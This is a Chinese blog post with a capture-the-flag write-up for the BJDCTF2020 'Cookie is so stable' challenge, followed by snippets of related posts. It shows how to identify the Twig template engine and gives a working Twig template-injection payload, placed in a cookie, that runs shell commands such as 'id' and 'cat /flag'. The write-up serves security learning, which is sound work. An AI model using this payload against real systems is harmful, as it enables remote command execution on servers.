[BJDCTF2020]Cookie is so stable

最新推荐文章于 2024-02-28 16:11:22 发布
最新推荐文章于 2024-02-28 16:11:22 发布
阅读量133 收藏 1
点赞数
分类专栏: CTF # ssti 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62905261/article/details/126311465
版权
CTF 同时被 2 个专栏收录
71 篇文章 0 订阅
订阅专栏
ssti
3 篇文章 0 订阅
订阅专栏

[BJDCTF2020]Cookie is so stable

主页面、flag页面、hint页面分别如下

题目提示的是cookie,先抓包看一下利用cookie传一下user发现有回显

测试一下ssti

在这里不是普通的ssti是Twig,涉及到一个知识点是输入{{7*'7'}}如果返回49的话就属于Twig,如果返回7777777则属于Jinja2,输入{{7*'7'}}查看一下

返回值是49,属于Twig,有固定的payload,先查看一下id:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

发现有回显,直接抓一下flag试试:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 

撒花结束

一夜至秋.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
获取cookie非常好用的google插件
06-10
标题中的“获取cookie非常好用的google插件”指的是在Google Chrome浏览器上的一种扩展程序,它允许用户方便地管理和操作浏览器中的Cookie数据。Cookie是网站在用户计算机上存储的小型文本文件,用于跟踪用户偏好、...
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
记录学习,一起进步
04-03 691
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
[BJDCTF2020]Cookie is so stable(漏洞原理详解)
pakho_C的博客
04-18 3247
web第45题 [BJDCTF2020]Cookie is so stable 打开靶场 访问flag页面 一个输入框 访问hint页面,查看源码 提示与cookie有关 那么在flag页面输入后抓包观察 输入后显示 登陆后抓包显示为 做到这里又遇到新的知识点了,模板注入漏洞 参考大佬的博客:一篇文章带你理解漏洞之 SSTI 漏洞,讲的非常详细 漏洞原理: SSTI 怎么产生的 服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过
IIS实现反向代理时Cookie域的设置方法
01-03
反向代理 神马是反向代理?指以代理服务器来接受Internet上的连接请求,然后将请求转发给内部网络上的服务器,并将从服务器上得到的结果返回给Internet上请求连接的客户端,此时代理...但是在多站点共享cookie时会存在
20210820cookie万能获取助手.rar
08-21
标题中的“20210820cookie万能获取助手.rar”暗示这是一款在2021年8月20日发布的工具,主要用于获取Web应用程序的Cookie信息。CookieWeb服务器存储在用户浏览器上的一小段数据,用于跟踪用户状态、个性化设置以及...
详解jQuery的Cookie插件
11-26
jQuery的Cookie插件是用于管理和操作浏览器Cookie的一种轻量级解决方案。主要由jQuery库扩展的$.cookie()函数实现。在JavaScript中,原生并不提供方便的API来处理Cookie,而jQuery.Cookie.js插件则简化了这一过程。 ...
SVM支持向量机分类鸢尾花数据集iris及代码
09-30
SVM支持向量机分类鸢尾花数据集iris及代码,数据集有Excel、data、txt文件格式,代码有data、txt格式演示
[BJDCTF2020]Cookie is so stable(ssti模板注入从0到1学习笔记)
姜小孩的博客
03-31 1704
ssti模板注入从0到1 [BJDCTF2020]Cookie is so stable buu
第四十七题——[BJDCTF2020]Cookie is so stable
分享简单的安全技术
04-27 188
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,在导航条看到flag链接,点击后要求提交用户名 第二步:查找漏洞点 输入admin没有反应 输入{{7*'7'}}后出现49,而不是7777777,说明是使用Twig模板而不是Jinja2 第三步:了解Twig漏洞后获取flag Twing漏洞 输入123使用burpsuite抓包,结合题目提示cookie,确定user有问题 修改user值为:{{_self.env.register
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)
小宇的web博客
02-18 2501
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解) 先看一下题目 有首页,有flag页面,有Hint页面 这里题目有提示,突破口是在cookie上面 这里先进行抓包分析 这里的知识点是利用服务端模板注入攻击。SSTI里面的Twig攻击 这里有判断模板注入类型的办法 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 这里在cookie处进行判断 user={{7*‘7’}},查看返回值
Twing模板注入 [BJDCTF2020]Cookie is so stable1
最新发布
m0_75178803的博客
02-28 478
打开题目我们先抓包分析一下可以输入{{7*7}}处发包试一下可以看到在cookie处存在ssti模板注入输入{{7*‘7’}},返回49表示是 Twig 模块输入{{7*‘7’}},返回7777777表示是模块在这里可以看出是Twing模块我们直接用固定payload就可以得到flag。
Uncaught ReferenceError: cookie is not defined
01-25
Uncaught ReferenceError: cookie is not defined错误通常是因为在代码中使用了未定义的cookie变量。这可能是由于以下几个原因导致的: 1. 拼写错误:请确保你在代码中正确地拼写了cookie变量。检查是否有任何拼写错误,例如将cookie写成了cookies。 2. 未引入cookie库:如果你使用了cookie库来处理cookie操作,例如js-cookie库,你需要确保已经正确地引入了该库。可以通过在代码中添加正确的引入语句来解决这个问题。 3. 作用域问题:如果你在代码中使用了cookie变量,但是该变量在当前作用域中未定义,那么就会出现该错误。请确保你在使用cookie变量之前已经定义了它。 以下是两种解决Uncaught ReferenceError: cookie is not defined错误的方法: 1. 检查拼写错误并引入cookie库: ```javascript import Cookies from 'js-cookie'; // 使用cookie变量 Cookies.set('key', 'value'); ``` 2. 在当前作用域中定义cookie变量: ```javascript // 定义cookie变量 const cookie = 'value'; // 使用cookie变量 console.log(cookie); ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值